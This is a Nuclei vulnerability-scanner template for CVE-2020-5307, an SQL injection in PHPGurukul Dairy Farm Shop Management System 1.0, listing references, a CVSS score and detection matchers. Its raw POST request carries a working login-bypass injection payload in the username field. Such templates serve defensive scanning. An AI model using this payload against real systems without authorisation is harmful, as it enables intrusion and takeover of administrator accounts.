nuclei-templates/cves/2020/CVE-2020-5307.yaml

41 lines
1.3 KiB
YAML

id: CVE-2020-5307
info:
name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection
author: gy741
severity: critical
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference:
- https://cinzinga.com/CVE-2020-5307-5308/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5307
- https://www.exploit-db.com/exploits/47846
- https://cinzinga.github.io/CVE-2020-5307-5308/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-5307
cwe-id: CWE-89
tags: sqli,edb,cve,cve2020
requests:
- raw:
- |
POST /dfsms/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "add-category.php"
- type: status
status:
- 302
# Enhanced by mp on 2022/04/28